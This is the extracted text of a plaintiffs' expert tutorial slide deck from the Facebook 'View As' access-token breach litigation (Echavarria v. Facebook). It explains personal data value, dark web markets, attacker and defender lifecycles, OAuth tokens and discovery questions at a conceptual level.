Upload
others
View
0
Download
0
Embed Size (px)
Citation preview
Echavarria,etal.v.Facebook,Inc.
3:18-cv-05982-WHA(andallrelatedcases)Plaintiffs’TutorialJanuary9,2019
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 1
Introduction • Plaintiffs’Counsel
• Morgan&Morgan,P.A.ComplexLitigationGroup• CohenMilsteinSellers&TollPLLC• MilbergTadlerPhillipsGrossmanLLP
• RetainedExperts• MaryT.Frantzwilldiscuss:
• PII,itsValue,andBasicSecurityAgainstHacking• Matt.B.Strebewilldiscuss:
• Authentication,AccessTokens,andHackingTokens
• Somequestionsmovingforward2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 2
PII, Its Value, and Basic Security Against Hacking
• MaryFrantz• Over28yearsexperienceincybersecurity,corporateenterprisetechnologyarchitecture,identityandaccessmanagement• CEOofEnterpriseKnowledgePartners,LLC• Hasservedasanexpertwitnessinseveraldatabreachcases• CertifiedEthicalHacker,PenetrationTester,InformationSystemsAuditor• CVprovidedfortheCourtandcounsel
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 3
Personally Identifiable Information (PII) • GeneralDefinitionandCaliforniaCalOPPA
• PIIDefined(CaliforniaOnlinePrivacyProtectionAct(CalOPPA)Cal.Bus.&Prof.CodeSec.2577(a))• DetailscollectedontheInternetaboutanindividualconsumer,includinganindividual’sfirstandlastname,aphysicalstreetaddress,anemailaddress,atelephonenumber,aSocialSecuritynumber,oranyotherinformationthatpermitsaspecificindividualtobecontactedphysicallyoronline.
• CompromisedPIIhastwomajortypes
• Temporaryor“changeable”information–shortshelflife• Examples:passwords,creditcardnumbers,bankaccounts,driverslicense,email,phonenumbers
• Historicalor”unchangeable”information–longorinfiniteshelflife• Examples:originalimages/photos,passportnumbers,currentandpreviousaddresses,mothersmaidenname,relationships(family,contacts,challengeresponsequestions),education,birthdate,SSN,employmenthistory,earningsandnetworth,healthhistory,purchasehistory,productdesigns,onlinecomments,signeddocs
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 4
PII – Value • AggregatedProfilesorFullz
• Fullz–complete“packages”ofinformation• Combinationofhistoricalandtemporaryinformation
• Highestvalue–Fullzaggregatedbehavioralandpersonalityprofiledescriptors• Opinions,contacts,familymembers,styleandeventchoices,onlineandphysicallocationsvisited,
interests(forexample:music,movies,colors,autopurchases,andsitesvisited),“changeable”and“unchangeable”information
• ConfidentialcorporateinformationandIP,customercomplaints,confidentialelectroniccommunication
• ValueofPII• Validatedand/orrecentlyupdatedFullzPII=higherstreetpriceperprofile• Fullzishighlycovetedbynationstates,“phishers,”malicioushackers,andspammers• Neural-marketing:theprocessofminingFullzfortargetedinfluenceandmanipulation• CollectionandminingofFullzhasbeenusedbynationstateclandestineoperations
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 5
PII – Darknet and Dark Web • Darknet
• Systemofroutersandrelayofdevicesthatarenotindexedordirectlyaccessible• Allcommunicationbetweentherelaysuseencryption• CannotaccessDarknetusingstandardinternetbrowsers;mustknowexactaddressoruseDarkWebbrowsers
• DarkWeb• AsubsetoftheDarknetthatworksoverHTML• WebservicesandspecificbrowsersrequiredtoaccessDarknet• Builtuponanonymousbrowsing• Specific,anonymousservicesavailable:messaging,emails,filessharingsites
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 6
PII – How It is Misused
• BigdatarepositoriescreatedfromcompromisedandlegitimatePIIonDarknet• Combinedandblendedasneeded• Soldoffinpiecesforcontinuedrevenuestreams• Piecessoldrarelyequatetoexactcopiesofstolendata(obfuscatessourceandtrail)• CompleteFullzNOTusuallyfoundorsoldonDarknetauctionsites
• UseofDarkWebforsellingstolendata• “Changeable”informationoftensoldonsalesorauctionsites;currencyisBTC• PiecesofFullzaresoldonsalesorauctionsites
• Usuallycopies(notoriginal),withdiminishedvalue• CompleteFullzsalesuseprivatemessaging,secureemails,burnerphones
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 7
Typical Targeting Attacker Lifecycle (not all phases are used, needed, process not linear)
Standard Attacker Lifecycle
Reconnaissance Scanning
and Penetration
Attempt Access
Establish Foothold
Establish Persistence
Exfiltrate Eliminate intrusion evidence
• Performphysical,logicalreconnaissance(website,employees,physicalsites,etc.)
• Usewebcrawlers/spiders,NMAP• Vulnerabilityscan• Registerasdeveloperandgaininsights• Testpossiblevulnerabilities,learnfrom
errormessages/responses• Testaccess–seewhatworks,whatdoesn’t
andwhy
• Accessandcreate“backdoors”• Openupports• Harvestand/orelevatecredentials
(impersonaterealuserandserviceaccounts)
• Root• Deleteevidenceastheygo(advanced),
timestomp• Exfiltrate
• Leavebackdoors• Deletelogs• Maysellorshare
vulnerabilitytoscriptkiddiestocovertracks,createnoise(causechaos)
• Comebackafternoisecalmsdownorusenoiseasacover
• Watchforreactions,methodofremediation
High Level Hacker Lifecycle
• Advancedattackersdonotwanttogetcaught,maximize“timeontarget”
• “Scriptkiddies”arenotadvanced,theyoftenmakenoisethatis[sometimes]easilydetected
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 8
Sample Crawl or Spider • Usingafreetool
providedbyOWASPcalled“Zap”
• Finds/crawlsall
URLsandcallsbeingusedbyapplicationduringeachstepofaprocess
• Lookforexposed
informationincludingcookies,tokens,logincredentials,infrastructureinfo,etc.
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 9
Typical Targeting Attacker Lifecycle (not all phases are used, needed, process not linear)
Standard Attacker Lifecycle
Defensible Posture and
Cyber Resilience
Reconnaissance Scanning
and Penetration
Attempt Access
Establish Foothold
External Threat Intelligence
Self Reconnaissance External Vulnerability Scanning
Harden/IsolateEnvironments
Logging/MonitoringInternalVulnerabilityScanning
SecureApplicationDevelopment/Testing
Third Party Assessments Threat Mitigation
Threat Remediation Bug Bounty Programs
Establish Persistence Exfiltrate
Eliminate intrusion evidence
Typical Corporate Cyber Threat Mitigation
Inform&improve
High Level Security Lifecycle
• Emulateattacker/blackhatreconnaissancescanningandpentesting
• Monitorthedarknetforchatteraboutattacks,datadumps
• Monitorandlogforanomalousbehavior• Constantvulnerabilitytestingusinglatest
signatures• Securitytest/codereviewnewreleases,
regressiontestexistingsoftware/codeservices/web/datastores/apps/containers
• Hardendevices/services• Constanttraining/updating
• PeriodiclivetestingofIRplan• SecurityPostureAssessments• RedTeam/BlueTeamexercises• Thirdpartyaudits,internalaudits• Thirdpartytestingviabugbounty
• CorporateOwners• CISO,ComplianceOfficer,
GeneralCounsel• SecurityArchitecture• SOC
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 10
Securing Databases • Generally,twotypesofdatabases–StructuredandUnstructured(No-SQL)
• No-SQLdoesnotcontaindefaultaudittrailsandbuilt-insecurity• Encryptingstoragemaycauseunacceptablelatency,butanorganizationcanencrypttiersbaseduponlastaccessdate,ageofdata,andotherqualifiers
• BestpracticeNo-SQLisacombinationofthefollowing:• Strongmulti-factorauthenticationandauthorization• Strongperimeternetworkandisolation
• Changedefaultports• Segmentationofaccessrights(gateways)• Time-basedaccesscontrols• Disallowconcurrentaccess
• Inputandextractvalidation• Auditorlogallpluginaccess(trustedanduntrusted),serverlogs,andcontrolaccesstologs
• Replicationanddatasegmentation,keystructures• Strongencryptionwherepossible
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 11
Securing Web Apps • OWASP(OpenWebApplicationSecurityProject)
• Globallyrecognizednon-profitforcloudsecuritybestpracticesandstandards• Industrystandard:
• TestfortheTop10SecurityRisksforCloudbasedapplications• Opensourcevulnerabilityscanningsoftware• Securitysoftwareassurancematuritymodel• Opensourcetoolsandresources–testingtools,bestpracticecode
• Acceptedasthestandardforweb-basedapplicationsformostorganizations• OWASPcriticalthreatsandpenetrationtestingmethods
• CrossSiteScripting(XSS)• Enablesattackerstoinjectclient-sidescripts,bypassaccesscontrolssuchasthesame-originpolicy,stealvisibletokensandcookies
• CrossSiteRequestForgery(XSRF)• BrokenAccessControl
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 12
Authentication, Access Tokens, and Hacking Tokens
• MattStrebe• Over29yearsofexperienceinthefieldofcybersecurity,databasedesignandsecurity,securenetworkprotocols,andcryptography• CEOofConneticITServices&CeNRGcloudhosting• Hasservedasanexpertwitnessinseveraldatabreachcases• Authorofnumerousbooksandpublications,includingNetworkSecurityFoundations&Firewalls24x7• Inventor,“NoTransfer”(NOTX)patenteddeviceauthenticationprotocol• CVprovidedfortheCourtandcounsel
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 13
Authentication
• Loggingin• AccesstoPrivateResources• AccessControlLists
• SessionsandWebSessions• Websitesimultaneousaccesstomultipleresourcesinadistributedwebapplication• AuthenticationandAuthorizationaredifferentmatters• Here,itappearsauthenticationistheissue,notencryption• Largescalewebapplicationstypicallyuseaccesstokenstosolvedistributedaccesscontrolissues
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 14
Access Tokens • AccessToken
• Anaccesstokenisanobjectencapsulatingthesecurityidentityofaprocesssuchasawebsession.Atokenisusedtomakesecuritydecisionsandtostoretamper-proofinformationaboutsomesystementity.Anaccesstokenisgeneratedbybythelogonservicewhenauserlogsontothesystem
• Bearerinstrumentexample:courtaccesskeycards• Cancontainanythingthedeveloperwants• AccessTokencouldbelimitedtoasinglepurpose(masterkeyv.bathroomkey)
• TypesofTokens• UserAccessToken(short-term,long-term)• AppAccessToken• RefreshToken
• ForFacebook• Here,itappearsthetokenFacebookassociatedwiththe“ViewAs”functiongavethehackerthesameaccessastheoriginaluser(e.g.,keycard)
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 15
How Tokens are Transacted and Used • Tokenportability(andtheftability)
• Theyareprotected• OnWebserversbyencryptionatrest• IntransitovertheInternetbyencryptioninflight• OnWebbrowsersbyencryptionatrest
• Theyarenotnecessarilyprotectedintherunningwebbrowser• DevelopersmustbecarefulwhensendingAccessTokenstothewebbrowserclient,suchthatitappliesonlytothatuser• Fordeveloper,aconscioustrade-offbetweensecurityandease-of-use• Expeditedaccessrequiresconstantvigilanceuponimplementation• Accesstokenshouldneverbeexposedtoanyotherusersinarunningbrowser
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 16
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 17
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 18
OAuth 2.0
• OAuth2.0isanauthorizationprotocolfrequentlyusedasaneasierauthenticationprotocol• UsedbycompanieslikeFacebook• Theaccesstokensupplantsotherauthenticationsteps• Allowsthird-partymarketerssomebenefits
• Forexample:simpleuserexperiencetoprevent“usagewalls”andencourageadoption• AdoptionofOAuth2.0
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 19
OAuth 2.0 – Vulnerabilities
• ButOAuth2.0presentsagreaterriskofthe“bearerinstrument”beingmisused• Youdon’thavetodecryptorcomprehendanAccessTokentouseit• Whenyoufindsomeoneelse’sAccessTokeninawebsession,youhavewhateverlevelofaccessthattokenpermitswithinitsexpiration• Easeofcoding,codere-use,complexapplicationdesign,andlackoftestingleadtomistakesandincreasedriskstousers’PII
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 20
How Tokens Can Be Exploited • Hackersdeterminethattheycanexploitawebsitetoobtainanotheruser’sAccessToken• Hackersaccessthewebsiteaseachuser,accessPII,thenidentifyandstealotheravailableAccessTokens• AndRepeat.Veryquickly,hackercanobtainmanymillionsofaccounts’AccessTokenswithautomatedscripts(“crawling”)• PIIistakenandinpossessionofhackersandmisusedand/orsold
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 21
Preliminary Questions 1. Howwasthe“ViewAs”tokendeveloped,securityandfunctionality
tested,priortorelease?a) WhatprocessdidFacebookusetotestthe“ViewAs”featurepriortorelease?b) Whereelsewas/isthetokenused?c) WhatSecurityDevelopment(i.e.SecureSDLC)processesdoesFacebookusetotest
theirsoftwarepriortorelease?
2. WhendidFacebookfirstdetecttheissue,andhow?3. WhendidFacebookidentifytherootcauseoftheissue,andhow?4. AnyreportdonebyFacebookorthird-party?5. HowdidFacebookdeterminetheaffectedentities?6. WhatstepsdidFacebooktaketocontainandremediatetheissue?
2019–Plaintiffs’Tutorialin3:18-cv-05982-WHA(andallrelatedcases) 22